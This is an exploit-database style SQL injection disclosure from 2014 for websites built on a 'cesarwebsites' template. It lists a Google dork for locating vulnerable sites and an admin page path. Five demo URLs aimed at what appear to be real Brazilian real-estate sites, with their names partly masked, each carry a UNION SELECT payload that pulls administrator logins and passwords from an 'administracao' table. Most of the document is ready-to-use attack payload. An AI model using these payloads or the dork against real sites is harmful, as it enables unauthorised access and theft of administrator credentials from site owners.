$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ # Exploit Title : Powred by cesarwebsites SQL injection vulnerability # Exploit Author : Cyber Hacker # Vendor Homepage : http://cesarweb.com.br/ # Google Dork : inurl:detalhes.php?id= & intext:CesarWeb.com.br # Date: 2014-1-13 # Tested on: Windows 7 / Mozilla Firefox $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ # Location : localhost/detalhes.php?id=[Sql Injection] # Admin Page: localhost/manutencao/ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Demo: http://www.andreamXartinsimoveis.com.br/detalhes.php?id=-60+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,login,senha,12,13,14,15,16,17,18,19,20,21+from+administracao--+ http://www.marcoagXualuzaimoveis.com.br/detalhes.php?id=-258+/*!50000UNION*/+/*!50000SELECT*/+%201,2,3,4,5,6,senha,8,9,10,11,12,login,14,15,16,17,18+from+administracao--+ http://www.jeffersoXnbuitragoimoveis.com.br/detalhes.php?id=-186+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,senha,login,14,15,16,17,18,19,20,21,22+from+administracao--+ http://www.aloizioiXmoveis.com.br/detalhes.php?id=-93+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,senha,14,15,16,17,18+from+administracao--+ http://www.aluguelfixoXcabofrio.com.br/detalhes.php?id=-93+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,senha,12,login,14,15,16,17,18,19,20,21+from+administracao--+ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ # # discovered by : CyberHacker # # Greets to: Milad Hacking, Eb051, hossein19123 # ######################